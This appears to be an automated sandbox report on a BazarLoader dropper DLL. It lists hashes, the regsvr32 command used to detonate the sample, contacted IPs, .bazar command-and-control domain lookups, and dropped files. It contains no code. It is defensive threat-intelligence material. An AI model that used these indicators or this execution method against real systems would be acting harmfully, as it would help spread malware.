Malware Analysis Report

2024-10-23 17:37

Sample ID 231225-t8xb9ahadk
Target 2e1d6c57465d2399a54708ae1ffbebb0
SHA256 6a5d2d7b3eb9ac26f0bdf852a38ed3bb5f6be9a2abf9339d4cf41e8e946ebb1a
Tags
bazarloader dropper loader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6a5d2d7b3eb9ac26f0bdf852a38ed3bb5f6be9a2abf9339d4cf41e8e946ebb1a

Threat Level: Known bad

The file 2e1d6c57465d2399a54708ae1ffbebb0 was found to be: Known bad.

Malicious Activity Summary

bazarloader dropper loader

Bazar Loader

Bazar/Team9 Loader payload

Tries to connect to .bazar domain

Unexpected DNS network traffic destination

Unsigned PE

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2023-12-25 16:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-25 16:44

Reported

2023-12-26 12:35

Platform

win7-20231215-en

Max time kernel

140s

Max time network

149s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2e1d6c57465d2399a54708ae1ffbebb0.dll

Signatures

Bazar Loader

loader dropper bazarloader

Bazar/Team9 Loader payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2e1d6c57465d2399a54708ae1ffbebb0.dll

Network

Country Destination Domain Proto
US 52.8.202.218:443 tcp
US 52.8.202.218:443 tcp
US 54.185.61.176:443 tcp
US 54.185.61.176:443 tcp
NL 45.148.120.206:443 tcp
NL 45.148.120.206:443 tcp
DE 45.153.240.189:443 tcp
DE 45.153.240.189:443 tcp
US 8.8.8.8:53 api.opennicproject.org udp
DE 116.203.98.109:443 api.opennicproject.org tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
DE 116.203.98.109:443 api.opennicproject.org tcp

Files

memory/2916-0-0x0000000027600000-0x000000002763E000-memory.dmp

memory/2916-1-0x000007FEF6860000-0x000007FEF69E1000-memory.dmp

memory/2916-3-0x0000000027600000-0x000000002763E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab4720.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar47BF.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d3b38b2f68ab80c66b04c2c2b1ee4946
SHA1 11c1f4b8ccc5e770b3f06f4e3512d82257fb95c5
SHA256 f1fe50512e3db14e98d64972445280cd96cc1d6f0ac9bb6f295968d0de11e774
SHA512 27d07f78bd8e052cbce0df623b652bd27c6cc2bda7c16db13615f2074a0a6c0aacd513758b9bcc7f5696a2da342d2ceb8f91a5e75d36283b43892ed1b301addf

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-25 16:44

Reported

2023-12-26 12:36

Platform

win10v2004-20231215-en

Max time kernel

143s

Max time network

154s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2e1d6c57465d2399a54708ae1ffbebb0.dll

Signatures

Bazar Loader

loader dropper bazarloader

Bazar/Team9 Loader payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Tries to connect to .bazar domain

Description Indicator Process Target
N/A yellowdownpour81.bazar N/A N/A
N/A yellowdownpour81.bazar N/A N/A
N/A yellowdownpour81.bazar N/A N/A
N/A yellowdownpour81.bazar N/A N/A
N/A yellowdownpour81.bazar N/A N/A
N/A yellowdownpour81.bazar N/A N/A
N/A yellowdownpour81.bazar N/A N/A
N/A whitestorm9p.bazar N/A N/A
N/A whitestorm9p.bazar N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 94.16.114.254 N/A N/A
Destination IP 195.10.195.195 N/A N/A
Destination IP 194.36.144.87 N/A N/A
Destination IP 217.160.188.24 N/A N/A
Destination IP 172.98.193.62 N/A N/A
Destination IP 198.50.135.212 N/A N/A
Destination IP 91.217.137.37 N/A N/A
Destination IP 194.36.144.87 N/A N/A
Destination IP 195.10.195.195 N/A N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2e1d6c57465d2399a54708ae1ffbebb0.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 16.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 167.109.18.2.in-addr.arpa udp
US 52.8.202.218:443 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 54.185.61.176:443 tcp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 100.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
NL 45.148.120.206:443 tcp
DE 45.153.240.189:443 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
DE 116.203.98.109:443 tcp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
DE 116.203.98.109:443 tcp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 195.195.10.195.in-addr.arpa udp
PA 186.73.40.224:443 tcp
US 8.8.8.8:53 udp
N/A 2.19.169.32:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 96.17.179.193:80 tcp
DE 195.10.195.195:53 udp
DE 195.10.195.195:53 whitestorm9p.bazar udp
DE 194.36.144.87:53 whitestorm9p.bazar udp
PA 186.73.40.224:443 tcp
US 8.8.8.8:53 87.144.36.194.in-addr.arpa udp
DE 195.10.195.195:53 yellowdownpour81.bazar udp
DE 194.36.144.87:53 yellowdownpour81.bazar udp
RU 91.217.137.37:53 yellowdownpour81.bazar udp
DE 217.160.188.24:53 yellowdownpour81.bazar udp
US 172.98.193.62:53 yellowdownpour81.bazar udp
US 8.8.8.8:53 24.188.160.217.in-addr.arpa udp
US 8.8.8.8:53 62.193.98.172.in-addr.arpa udp
CA 198.50.135.212:53 yellowdownpour81.bazar udp
DE 94.16.114.254:53 yellowdownpour81.bazar udp
PA 186.73.40.224:443 tcp
US 8.8.8.8:53 212.135.50.198.in-addr.arpa udp
US 8.8.8.8:53 254.114.16.94.in-addr.arpa udp

Files

memory/3120-0-0x0000000027E40000-0x0000000027E7E000-memory.dmp

memory/3120-1-0x00007FFAD53C0000-0x00007FFAD5541000-memory.dmp

memory/3120-3-0x0000000027E40000-0x0000000027E7E000-memory.dmp